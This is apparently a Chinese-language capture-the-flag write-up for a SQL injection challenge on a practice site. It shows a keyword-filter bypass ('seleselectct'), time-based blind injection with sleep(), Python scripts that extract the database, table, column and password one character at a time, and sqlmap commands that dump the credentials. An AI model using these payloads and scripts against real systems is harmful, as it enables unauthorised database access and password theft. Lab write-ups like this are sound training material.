嗯~打開題目看見一個逼格有點高的圖
查看網頁源代碼,表單以get的方式傳送三個參數(admin,pass,action)給index.php,但是限制了兩個輸入框的最大長度是10,這個是前端的限制,形同虛設。我們可以用按瀏覽器的F12,改變其值的大小,或者在URL欄中輸入都可以。
然后我們在輸入框中隨便輸入一點測試看會報什么錯,或者過濾了什么關鍵字符,我們可以輸入一些敏感的字符串。然后我們可以看見我們在admin中輸入的會打印在屏幕上。並且我們發現用戶名框把select,#過濾了,而select只是簡單的過濾,可以構造成seleselectct繞過;而且我們在用戶名輸入admin時爆的錯可以讓我們確定正確的用戶名就是admin
既然知道了用戶名,且substring,mid語句都沒有被過濾。我們開始構造注入語句看看能不能成功。
http://ctf5.shiyanbar.com/basic/inject/index.php?pass=&action=login&admin=admin' and sleep(5) or '1'='0"
嗯~發現頁面等了5~6秒才顯示。說明語句執行成功了。可以注入!!
開始寫python3腳本
爆庫名
1 import requests 2 import string 3
4 gress=string.ascii_lowercase+string.ascii_uppercase+string.punctuation+string.digits 5 databaseName=''
6
7 for i in range(1, 13): #假設庫名長度為12
8 for playload in gress: 9
10 url = "http://ctf5.shiyanbar.com/basic/inject/index.php?pass=&action=login&admin=admin' and case when(substr(database(),%s,1)='%s') then sleep(10) else 1 end or '1'='0" %(i,playload) 11 #key={'pass':'','action':'login'}
12 try: 13 print("正在測試第%d個字符是否為'%s'"%(i,playload)) 14 r = requests.get(url,timeout=4) 15 except: 16 suo=0 17 databaseName+=playload 18 print("數據庫名為是%s"%databaseName) 19 break
20
21 print(databaseName)
庫名是test
然后開始爆表名
1 import requests 2 import string 3
4 url = 'http://ctf5.shiyanbar.com/web/wonderkun/index.php'
5 str=string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation 6 tableName=[] 7 for i in range(0,5): #假設web4中有五個表
8 Name=''
9 flag2=0 10 for col in range(1,11):#假設每個表的最大長度不超過10
11 flag=0 12 for payload in str: 13 url = "http://ctf5.shiyanbar.com/basic/inject/index.php?pass=&action=login&admin=admin' and case when(substr((seleselectct table_name from information_schema.tables where table_schema='test' limit 1 offset %d),%d,1)='%s') then sleep(5) else 1 end or '1'='0" %(i,col,payload) 14 try: 15 print(url) 16 r = requests.get(url, timeout=4) 17 except: 18 flag=1
19 flag2=1
20 Name += payload 21 print("第%s個表為是%s" % (i+1,Name)) 22 break
23 #tableName.append(Name)
24 if flag==0: 25 break
26 if(flag2==0): 27 break
28 tableName.append(Name) 29
30 for a in range(len(tableName)): 31 print(tableName[a])
就一張表,表名為admin
爆字段
1 import requests 2 import string 3
4 url = 'http://ctf5.shiyanbar.com/web/wonderkun/index.php'
5 str=string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation 6 columnName=[] 7 for i in range(0,5): 8 Name=''
9 flag2=0 10 for col in range(1,11):#假設每個列名的最大長度不超過10
11 flag=0 12 for payload in str: 13 url = "http://ctf5.shiyanbar.com/basic/inject/index.php?pass=&action=login&admin=admin' and case when(substr((seleselectct column_name from information_schema.columns where table_name='admin' limit 1 offset %d),%d,1)='%s') then sleep(5) else 1 end or '1'='0" % (i, col, payload) 14 try: 15 print(url) 16 r = requests.get(url, timeout=4) 17 except: 18 flag=1
19 flag2=1
20 Name += payload 21 print("第%s個字段為是%s" % (i+1,Name)) 22 break
23 if flag==0: 24 break
25 if(flag2==0): 26 break
27 columnName.append(Name) 28
29 for a in range(len(columnName)): 30 print(columnName[a])
爆出字段內容
1 import requests 2 import string 3
4 gress=string.ascii_lowercase+string.ascii_uppercase+string.punctuation+string.digits 5 databaseName=''
6
7 for i in range(1, 16): #假設庫名長度為15
8 for playload in gress: 9
10 url = "http://ctf5.shiyanbar.com/basic/inject/index.php?pass=&action=login&admin=admin' and case when(substr((seleselectct password from admin),%d,1)='%s') then sleep(5) else 1 end or '1'='0" %(i,playload) 11
12 try: 13 print("正在測試第%d個字符是否為'%s'"%(i,playload)) 14 r = requests.get(url,timeout=4) 15 except: 16 suo=0 17 databaseName+=playload 18 print("內容為是%s"%databaseName) 19 break
20
21 print(databaseName)
OK 內容就是idnuenna。
下面用sqlmap來注入。
在sqlmap中輸入
sqlmap.py -u "http://ctf5.shiyanbar.com/basic/inject/index.php?pass=&action=login&admin=admin"
發現是可以注入的!
開始爆庫名
sqlmap.py -u "http://ctf5.shiyanbar.com/basic/inject/index.php?pass=&action=login&admin=admin" --dbs
爆表名
sqlmap.py -u "http://ctf5.shiyanbar.com/basic/inject/index.php?pass=&action=login&admin=admin" --tables -D "test"
爆列名
sqlmap.py -u "http://ctf5.shiyanbar.com/basic/inject/index.php?pass=&action=login&admin=admin" --columns -T "admin" -D "test"
爆內容
sqlmap.py -u "http://ctf5.shiyanbar.com/basic/inject/index.php?pass=&action=login&admin=admin" --dump -C "password" -T "admin" -D "test"
好啦,密碼已經出來啦